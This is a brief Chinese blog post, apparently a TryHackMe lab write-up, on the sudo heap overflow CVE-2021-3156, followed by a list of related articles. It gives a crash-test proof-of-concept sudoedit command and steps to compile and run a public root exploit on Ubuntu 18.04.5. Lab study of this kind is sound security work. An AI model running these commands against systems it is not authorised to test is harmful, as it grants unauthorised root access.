Sudo 堆缓冲区溢出漏洞(CVE-2021-3156)

最新推荐文章于 2021-07-09 11:16:55 发布
最新推荐文章于 2021-07-09 11:16:55 发布
阅读量506 收藏
点赞数
分类专栏: Try Hack Me靶机 Linux提权 文章标签: 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44101248/article/details/113766003
版权

Baron Samedit(CVE-2021-3156

A tutorial room exploring CVE-2021-3156 in the Unix Sudo Program. Room Three in the SudoVulns Series

Sudo 堆缓冲区溢出漏洞

受影响版本:
  • Sudo 1.8.2 - 1.8.31p2
  • Sudo 1.9.0 - 1.9.5p1
 
 
POC:
    sudoedit -s '\' $(python3 -c 'print("A"*1000)')
    (返回malloc(): memory corruption
               Aborted (core dumped)则表示系统容易收到攻击)
 
EXP:   
 
POC:
    sudoedit -s '\' $(python3 -c 'print("A"*1000)')
 
 
 
下载EXP,cd到Exploit目录,看到一个Makefile文件,输入make即可进行编译
运行程序时提示后面要加参数0/1/2
 
我们是Ubuntu18.04.5,所以我们使用./sudo-hax-me-a-sandwich 0
z4yn:)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sudo缓冲区溢出提权漏洞CVE-2021-3156
Ryan的博客
01-13 2673
sudo缓冲区溢出提权漏洞CVE-2021-3156
CVE-2021-3156 sudo溢出漏洞
qq_49279082的博客
02-21 360
sudo溢出漏洞(一个属于内网提权的漏洞)
CVE-2021-3156sudo Heap overflow sudo本地提权复现与分析)
「鸿渐之翼」的博客
02-04 4395
CVE-2021-3156简介:
CVE-2021-3156Sudo 缓冲区溢出漏洞通告
爱国小白帽
01-27 4115
报告编号:B6-2021-012701 报告来源:360CERT 报告作者:360CERT 更新日期:2021-01-27 0x01漏洞简述 2021年01月27日,360CERT监测发现RedHat发布了sudo 缓冲区/栈溢出漏洞的风险通告,该漏洞编号为CVE-2021-3156漏洞等级:高危,漏洞评分:7.0。 攻击者在取得服务器基础权限的情况下,可以利用sudo基于缓冲区溢出漏洞,获得root权限。 目前debain已经修复该漏洞,centos依然受到影响 对此,360CERT建议广大用户及.
CVE-2021-3156】linux sudo提权复现及补丁修复
redwand的博客
02-01 3748
今天安全圈都在刷屏【CVE-2021-3156】这个漏洞,由于这是一个缓冲区溢出漏洞,通用性比较强,因此也跟个风实验一下,详细复现及修复过程如下。
Sudo缓冲区溢出漏洞(CVE-2021-3156)
04-06
linux sudo升级为1.9.5p2 及以上版本,sudo-1.9.10-1.el7.x86_64.rpm
centos7-sudo-1.9.9.rpm包。修复CVE-2021-3156Sudo缓冲区溢出漏洞
01-30
此为centos7版的最新sudo-1.9.9.rpm包,修复修复CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el7.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
如何解决基于sudo缓冲区溢出漏洞:如何解决基于Sudo缓冲区溢出漏洞CVE-2021-3156
02-12
sudo基于缓冲区溢出漏洞CVE-2021-3156原始发行日期:2021年2月2日Sudo发布了一个针对基于缓冲区溢出漏洞CVE-2021-3156的公告,该公告影响sudo旧版1.8.2至1.8。 .31p2和稳定版本1.9.0至1.9.5p1。 终端...
centos6-sudo-1.9.9.rpm包;修复CVE-2021-3156Sudo缓冲区溢出漏洞
01-30
此为centos6版的最新sudo-1.9.9.rpm包,修复修复CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el6.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
CVE-2021-3156:在Debain 10上利用Sudo溢出(CVE-2021-3156
04-05
CVE-2021-3156 CVE-2021-3156:Debain 10的Sudo溢出利用全文: :目前已测试: 须藤 Version 1.8.27 (1.8.27-1+deb10u2) Checksum (sha256): ca4a94e0a49f59295df5522d896022444cbbafdec4d94326c1a7f333fd030038...
CVE-2021-3156:CVE-2021-3156
03-06
CVE-2021-3156
【操作系统安全】_sudo提权_CVE-2021-3156
soldi_er的博客
04-04 4063
文章目录sudo提权简单叙述实验利用Linux用户管理烂土豆提权cve-2019-14287参考 sudo提权 简单叙述 发布时间 CVE编号 类型 等级 影响范围 远程利用 2021-01-27 CVE-2021-3156 权限提升 高危 Sudo 1.8.2-31p2,Sudo 1.9.0-5p1 否   Sudo是一款允许普通用户执行root权限命令的工具, 在2021年01月26日被披露存在一个基于缓冲区溢出漏洞(被命名为Baron Samedit),可导致本地权限提升。
cve-2021-3156 POC漏洞利用方式以及修复办法
热门推荐
网站安全专家
01-28 1万+
临近2021春节年末,我们SINE安全监测中心发现Linux系统被爆出致命漏洞,导致大部分服务器受到黑客的攻击与入侵,该漏洞发生的根源是由于系统的管理命令。SUDO存在问题,导致普通用户无需输入root密码,可以直接使用sudo命令提权到root管理员权限,这漏洞是今年linux爆出的最大的漏洞,危害性极高,目前受漏洞影响的Linux版本是Linux Sudo1.8.2- 1.8.31p2 LinuxSudo1.9.0- 1.9.5 p1等版本,可以说是大多数的linux系统都有漏洞。目前我们已对SINE.
CVE-2021-3156 sudo溢出 漏洞分析
weixin_50987385的博客
03-06 694
APP安全
CVE-2021-3156
weixin_48300170的博客
07-09 184
CVE-2021-3156 Linux sudo权限提升漏洞 复现漏洞简介漏洞信息漏洞原理环境搭建漏洞复现漏洞修复 复现) 漏洞简介       linux kernel一般指Linux内核。Linux是一种开源电脑操作系统内核。它是一个用C语言写成,符合POSIX标准的类Unix操作系统。       overlayfs文件系统实现中存在一个权限检查漏洞,本地普通用户可以获取管理员权限。
CVE-2021-3156Sudo 缓冲区溢出漏洞
墨痕诉清风的博客
01-28 3326
源码编译安装最新Sudo软件包,下载链接为: https://www.sudo.ws/dist/)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得。解析命令行参数的方式中发现了基于缓冲区溢出。任何本地用户(普通用户和系统用户,1. 进入CVE-2021-3156-main目录下。使用make命令对当前目录下的文件进行编译。根据我们版本,我们选择0,尝试。,获取Root权限,提权成功。查看EXP支持的系统版本。
Sudo缓冲区溢出提权漏洞CVE-2021-3156
jammny
02-04 1683
漏洞详情 sudo通过-s或-i参数在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i参数运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。当系统存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。 漏洞影响 sudo 1.8.2 - 1.8.31 p2 sudo 1.9.0 - 1.9.5 p1 漏洞利用 以非root用户身份登录系统,运行命令:sudoedit -s /
Linux sudo溢出漏洞CVE-2021-3156
01-28 1063
漏洞描述: 2021年01月27日,RedHat官方发布了sudo 缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取root权限。漏洞POC已在互联网上公开,提醒Linux系统管理员尽快修复。 漏洞级别:高危 受影响的版本: sudo: 1.8.2 - 1.8.31p2 sudo: 1.9.0 - 1.9.5p1 修复版本: 1/CentOS修复方式...
CVE-2021-3156: sudo缓冲区溢出漏洞利用
weixin_46137328的博客
01-30 1560
0x00 漏洞简述2021年01月27日,360CERT监测发现RedHat发布了sudo 缓冲区/栈溢出漏洞的风险通告,该漏洞编号为CVE-2021-3156漏洞等级:高危,漏洞评分...
CVE-2021-3156-main
最新发布
09-09
漏洞使攻击者可以通过滥用Sudo命令的缓冲区溢出漏洞来获得特权访问权限。 具体来说,当在具有特权的用户身份下运行Sudo命令时,由于错误的输入验证,攻击者可以在上写入超过其分配的内存空间,从而覆盖关键...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值